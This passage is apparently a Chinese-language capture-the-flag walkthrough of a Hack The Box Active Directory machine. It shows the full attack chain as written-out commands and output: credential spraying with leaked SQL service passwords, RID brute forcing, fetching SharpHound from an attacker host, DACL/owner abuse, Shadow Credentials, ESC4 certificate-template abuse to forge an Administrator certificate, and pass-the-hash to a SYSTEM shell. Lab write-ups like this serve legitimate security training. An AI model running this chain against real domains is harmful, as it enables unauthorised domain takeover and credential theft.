-a---- 9/24/2019 5:20 PM 19950 INSTALLCLUSTERWIZARD.XML
-a---- 9/24/2019 5:20 PM 20522 INSTALLWIZARD.XML
-a---- 9/24/2019 5:20 PM 486 LANDINGPAGE.EXE.CONFIG
-a---- 9/24/2019 5:20 PM 92538 PIDPRIVATECONFIGOBJECTMAPS.XML
-a---- 9/24/2019 5:20 PM 13679 PREPARECLUSTERWIZARD.XML
-a---- 9/24/2019 5:20 PM 8698 PREPAREIMAGEWIZARD.XML
-a---- 9/24/2019 5:20 PM 4946 REMOVENODE.XML
-a---- 9/24/2019 5:20 PM 6999 REPAIRWIZARD.XML
-a---- 9/24/2019 5:20 PM 1403 RUNRULESUI.XML
-a---- 9/24/2019 5:20 PM 486 SCENARIOENGINE.EXE.CONFIG
-a---- 9/24/2019 5:20 PM 4648 UNINSTALLWIZARD.XML
-a---- 9/24/2019 5:20 PM 14573 UPGRADEWIZARD.XML
Directory: C:\SQL2019\ExpressAdv_ENU
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/24/2019 10:03 PM 788 MEDIAINFO.XML
-a---- 9/24/2019 10:03 PM 486 SETUP.EXE.CONFIG
-a---- 6/8/2024 3:07 PM 717 sql-Configuration.INI
...
檔案太多,跳過系統設定、Bootstrap、Binary 等等
🕛🕧🕐🕜🕑🕝🕒⏰...
在 C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI 找到 SQL Server 安裝設定檔
找到可用資訊:
PS C:\Windows\system32> type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysD*****"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
SEQUEL\sql_svc:WqSZAF6CysD*****
sa:MSSQLP@ssw0rd!(已知)
5. 嘗試登入 WinRM
- 嘗試
SEQUEL\sql_svc:WqSZAF6CysD*****
┌──(chw㉿CHW)-[~]
└─$ crackmapexec winrm 10.10.11.51 -u sql_svc -p 'WqSZAF6CysD*****' -d sequel.htb
...
HTTP 10.10.11.51 5985 10.10.11.51 [*] http://10.10.11.51:5985/wsman
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\sql_svc:WqSZAF6CysD*****
SEQUEL\sql_svc:WqSZAF6CysD*****:失敗
- 嘗試
EscapeTwo_name.txt:WqSZAF6CysD*****嘗試前面建立的 Userlist:EscapeTwo_name.txt
(SMB File Leak 找到的 User)
┌──(chw㉿CHW)-[~]
└─$ crackmapexec winrm 10.10.11.51 -u EscapeTwo_name.txt -p 'WqSZAF6CysD*****' -d sequel.htb
...
HTTP 10.10.11.51 5985 10.10.11.51 [*] http://10.10.11.51:5985/wsman
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\sa:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\angela:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\oscar:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\kevin:WqSZAF6CysD*****
EscapeTwo_name.txt:WqSZAF6CysD*****:失敗
5.1 爆破 SMB RID
┌──(chw㉿CHW)-[~]
└─$ crackmapexec smb 10.10.11.51 -u "rose" -p "KxEPkKe6R8su" --rid-brute
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [+] Brute forcing RIDs
SMB 10.10.11.51 445 DC01 498: SEQUEL\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.51 445 DC01 500: SEQUEL\Administrator (SidTypeUser)
SMB 10.10.11.51 445 DC01 501: SEQUEL\Guest (SidTypeUser)
SMB 10.10.11.51 445 DC01 502: SEQUEL\krbtgt (SidTypeUser)
SMB 10.10.11.51 445 DC01 512: SEQUEL\Domain Admins (SidTypeGroup)
SMB 10.10.11.51 445 DC01 513: SEQUEL\Domain Users (SidTypeGroup)
SMB 10.10.11.51 445 DC01 514: SEQUEL\Domain Guests (SidTypeGroup)
SMB 10.10.11.51 445 DC01 515: SEQUEL\Domain Computers (SidTypeGroup)
SMB 10.10.11.51 445 DC01 516: SEQUEL\Domain Controllers (SidTypeGroup)
SMB 10.10.11.51 445 DC01 517: SEQUEL\Cert Publishers (SidTypeAlias)
SMB 10.10.11.51 445 DC01 518: SEQUEL\Schema Admins (SidTypeGroup)
SMB 10.10.11.51 445 DC01 519: SEQUEL\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.51 445 DC01 520: SEQUEL\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.51 445 DC01 521: SEQUEL\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.51 445 DC01 522: SEQUEL\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.51 445 DC01 525: SEQUEL\Protected Users (SidTypeGroup)
SMB 10.10.11.51 445 DC01 526: SEQUEL\Key Admins (SidTypeGroup)
SMB 10.10.11.51 445 DC01 527: SEQUEL\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.51 445 DC01 553: SEQUEL\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.51 445 DC01 571: SEQUEL\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.51 445 DC01 572: SEQUEL\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.51 445 DC01 1000: SEQUEL\DC01$ (SidTypeUser)
SMB 10.10.11.51 445 DC01 1101: SEQUEL\DnsAdmins (SidTypeAlias)
SMB 10.10.11.51 445 DC01 1102: SEQUEL\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.51 445 DC01 1103: SEQUEL\michael (SidTypeUser)
SMB 10.10.11.51 445 DC01 1114: SEQUEL\ryan (SidTypeUser)
SMB 10.10.11.51 445 DC01 1116: SEQUEL\oscar (SidTypeUser)
SMB 10.10.11.51 445 DC01 1122: SEQUEL\sql_svc (SidTypeUser)
SMB 10.10.11.51 445 DC01 1128: SEQUEL\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.51 445 DC01 1129: SEQUEL\SQLRUserGroupSQLEXPRESS (SidTypeAlias)
SMB 10.10.11.51 445 DC01 1601: SEQUEL\rose (SidTypeUser)
SMB 10.10.11.51 445 DC01 1602: SEQUEL\Management Department (SidTypeGroup)
SMB 10.10.11.51 445 DC01 1603: SEQUEL\Sales Department (SidTypeGroup)
SMB 10.10.11.51 445 DC01 1604: SEQUEL\Accounting Department (SidTypeGroup)
SMB 10.10.11.51 445 DC01 1605: SEQUEL\Reception Department (SidTypeGroup)
SMB 10.10.11.51 445 DC01 1606: SEQUEL\Human Resources Department (SidTypeGroup)
SMB 10.10.11.51 445 DC01 1607: SEQUEL\ca_svc (SidTypeUser)
Domain
SEQUEL\Userlist:
Administrator(RID: 500)
Guest(RID: 501)
krbtgt(RID: 502)
DC01$(RID: 1000)
michael(RID: 1103)
ryan(RID: 1114)
oscar(RID: 1116)
sql_svc(RID: 1122)
rose(RID: 1601)
ca_svc(RID: 1607)
建立 userlist 嘗試 WinRM
┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo_smb.txt
Administrator
Guest
krbtgt
DC01$
michael
ryan
oscar
sql_svc
rose
ca_svc
┌──(chw㉿CHW)-[~]
└─$ crackmapexec winrm 10.10.11.51 -u EscapeTwo_smb.txt -p 'WqSZAF6CysD*****' -d sequel.htb
/usr/lib/python3/dist-packages/cme/cli.py:37: SyntaxWarning: invalid escape sequence '\ '
formatter_class=RawTextHelpFormatter)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'
command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
HTTP 10.10.11.51 5985 10.10.11.51 [*] http://10.10.11.51:5985/wsman
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\Administrator:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\Guest:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\krbtgt:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\DC01$:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [-] sequel.htb\michael:WqSZAF6CysD*****
WINRM 10.10.11.51 5985 10.10.11.51 [+] sequel.htb\ryan:WqSZAF6CysD*****3 (Pwn3d!)
成功取得 WinRM:
sequel.htb\ryan:WqSZAF6CysD*****
5.2 登入 WinRM
┌──(chw㉿CHW)-[~]
└─$ evil-winrm -i 10.10.11.51 -u 'sequel.htb\ryan' -p 'WqSZAF6CysD*****'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
✅ Get User Flag
在
\Users\ryan\Desktop找到 User flag
Privileges Escalation
7. 確認 User 資訊
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\ryan\Documents> net user ryan /domain
User name ryan
Full Name Ryan Howard
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/8/2024 9:55:45 AM
Password expires Never
Password changeable 6/9/2024 9:55:45 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/9/2024 10:16:26 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Management Department*Domain Users
The command completed successfully.
8. BloodHoud
SharpHound 掃描
*Evil-WinRM* PS C:\Users\ryan\Desktop> iwr http://10.10.14.179/SharpHound.ps1 -OutFile SharpHound.ps1 -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Desktop> . .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\ryan\Desktop> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\ryan\Desktop"
*Evil-WinRM* PS C:\Users\ryan\Desktop> ls
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2025 9:20 PM 12342 20250507212055_BloodHound.zip
-a---- 5/7/2025 9:21 PM 12374 20250507212157_BloodHound.zip
-a---- 5/7/2025 9:21 PM 9503 NGZlZGJhNTUtZGMxZi00MzRhLTkxYzUtZWNjYjM1NGU4YzNl.bin
-a---- 5/7/2025 9:14 PM 1308348 SharpHound.ps1
-ar--- 5/7/2025 6:27 AM 34 user.txt
*Evil-WinRM* PS C:\Users\ryan\Desktop> download 20250507212157_BloodHound.zip
Info: Downloading C:\Users\ryan\Desktop\20250507212157_BloodHound.zip to 20250507212157_BloodHound.zip
Info: Download successful!
BloodHound 分析
- 標記 User as Owned
sql_svc&Ryan
- 查看 Owned User 權限
Ryan 有
ca_svc的 WriteOwner 權限
( ca_svc是 CERT PUBLISHERS)
9. Shadow Credentials Attack
🎯 利用 ca_svc 取得 Kerberos 憑證,再用憑證發動 AD CS 提權給 Administrator。
利用 ryan 冒充 ca_svc 身分,嘗試取得 Kerberos TGT 與 NTLM Hash
┌──(chw㉿CHW)-[~]
└─$ certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysD*****' -account ca_svc -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '59bf8f52-d75b-2973-8d51-************'
[*] Adding Key Credential with device ID '59bf8f52-d75b-2973-8d51-************' to the Key Credentials for 'ca_svc'
[-] Could not update Key Credentials for 'ca_svc' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
試用 Certipy shadow add 失敗,因為 AD 不允許直接修改
msDS-KeyCredentialLink
certipy shadowcmd 實際行為:
- 產生一張自簽憑證(certificate + private key)。
- 將此憑證轉換為 KeyCredential 格式。
- 嘗試將 KeyCredential 注入至
ca_svc帳號的msDS-KeyCredentialLink屬性:
等同「將 ca_svc 加了一把萬用鑰匙」。- 使用這把憑證進行 Kerberos PKINIT 認證 → 嘗試取得 ca_svc 的 TGT。
- 嘗試使用 TGT 去 dump 出 ca_svc 的 NTLM Hash。 最後自動 還原原始 KeyCredential,清除痕跡。
9.1 更改 ca_svc Object Owner
使用 bloodyAD 把 ca_svc 的 Owner 改成 ryan
(Ryan 有 ca_svc 的 WriteOwner 權限)
┌──(chw㉿CHW)-[~]
└─$ bloodyAD -d sequel.htb --dc-ip 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysD*****' set owner 'ca_svc' 'ryan'
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc
將
ca_svc的 Owner 換成ryanOwner 才能後續修改 ACL
9.2 操控 DACL → 取得完整控制權
擁有 Owner 還是無法直接修改 DACL 權限,需使用 dacledit 把 FullControl 權限加入 DACL,才可讓 ryan 對該物件有實質操作權限。
使用 impacket-dacledit 賦予 ryan 完整 DACL 權限
┌──(chw㉿CHW)-[~]
└─$ impacket-dacledit -action write -principal ryan -target ca_svc -dc-ip 10.10.11.51 sequel.htb/ryan:WqSZAF6CysD*****
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250508-024050.bak
[*] DACL modified successfully!
現在
ryan可以寫入ca_svcObject 的任何屬性
9.3 再次嘗試 Shadow Credentials Attack
┌──(chw㉿CHW)-[~]
└─$ certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysD*****' -account ca_svc -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7b8b6175-3afc-7a5a-59d9-9d6ae12a492a'
[*] Adding Key Credential with device ID '7b8b6175-3afc-7a5a-59d9-9d6ae12a492a' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '7b8b6175-3afc-7a5a-59d9-9d6ae12a492a' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e**********
Dump 出
ca_svc的 NTLM hash
10. AD CS template vul(ESC4)
10.1 列出 ADCS 設定
憑證授權中心(CA)、憑證模板(Certificate Templates)
尋找是否存在已知的 ADCS 漏洞,ex:
ESC1:低權限使用者可以註冊證書ESC4:擁有對模板的 FullControl(可修改來假冒高權限帳號)ESC6:允許任意使用者指定 UPN
┌──(chw㉿CHW)-[~]
└─$ certipy find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e********** -dc-ip 10.10.11.51 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250508031445_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250508031445_Certipy.txt'
[*] Saved JSON output to '20250508031445_Certipy.json'
查看內容:
┌──(chw㉿CHW)-[~]
└─$ cat 20250508031445_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
Full Control Principals:Cert Publishers
ca_svc剛好就是 Cert Publishers 的成員 ,因此可以修改模板 ACL & 屬性。ESC4 漏洞
ADCS – ESC4
模板名稱:DunderMifflinAuthentication
漏洞描述:SEQUEL.HTB\Cert Publishers 對該 template 擁有 Full Control
👉🏻ca_svc是 Cert Publishers 成員,因此可以重寫 template 內容並發證給 Administrator
10.2 修改 Certificate Templates
修改 DunderMifflinAuthentication 內容,讓它變成可被濫用的 Certificate Templates
由 Certipy 自動處理:
✅ 移除不必要的 EKU 限制(如僅 Client Auth)
✅ 關閉管理員核准(msPKI-Enrollment-Flag)
✅ 啟用 SubjectAltName 的 UPN 設定(允許自定目標帳號)
✅ 確保允許「enrollee supplies subject」
✅ 調整 ACL 權限(如果需要)
┌──(chw㉿CHW)-[~]
└─$ certipy template -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e********** -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.10.11.51 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'DC01.sequel.htb' at '10.10.11.51'
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.51:636 - ssl
[+] Default path: DC=sequel,DC=htb
[+] Configuration path: CN=Configuration,DC=sequel,DC=htb
[*] Updating certificate template 'DunderMifflinAuthentication'
[+] MODIFY_DELETE:
[+] pKIExtendedKeyUsage: []
[+] msPKI-Certificate-Application-Policy: []
[+] MODIFY_REPLACE:
[+] nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00']
[+] flags: [b'0']
[+] pKIDefaultKeySpec: [b'2']
[+] pKIKeyUsage: [b'\x86\x00']
[+] pKIMaxIssuingDepth: [b'-1']
[+] pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15']
[+] pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff']
[+] pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0']
[+] msPKI-Enrollment-Flag: [b'0']
[+] msPKI-Private-Key-Flag: [b'16842768']
[+] msPKI-Certificate-Name-Flag: [b'1']
[*] Successfully updated 'DunderMifflinAuthentication'
10.3 以惡意 template 請求 Administrator 憑證
以 ca_svc 身分,透過修改後的惡意 template,偽造 Administrator 的憑證(.pfx)
┌──(chw㉿CHW)-[~]
└─$ certipy req \
-u ca_svc@sequel.htb \
-hashes 3b181b914e7a9d5508ea1e********** \
-ca sequel-DC01-CA \
-template DunderMifflinAuthentication \
-upn Administrator@sequel.htb \
-dc-ip 10.10.11.51 \
-out Administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 34
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'Administrator.pfx.pfx'
成功匯出憑證
10.4 Certipy 認證取得 Admin TGT / hash
使用偽造好的 Administrator.pfx 憑證,向 KDC 認證取得 Kerberos TGT 與 NTLM hash
┌──(chw㉿CHW)-[~]
└─$ mv Administrator.pfx.pfx Administrator.pfx
┌──(chw㉿CHW)-[~]
└─$ certipy auth \
-pfx Administrator.pfx \
-dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e...e5a0b3ff
成功取得 administrator NTLM hash
10.5 SYSTEM Shell
以 Admin hash 拿 SYSTEM shell
┌──(chw㉿CHW)-[~]
└─$ impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 'aad3b435b51404eeaad3b435b51404ee:7a8d4e...e5a0b3ff'
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.51.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file sjIYOWbL.exe
[*] Opening SVCManager on 10.10.11.51.....
[*] Creating service VHxq on 10.10.11.51.....
[*] Starting service VHxq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
✅ Get Root FLAG
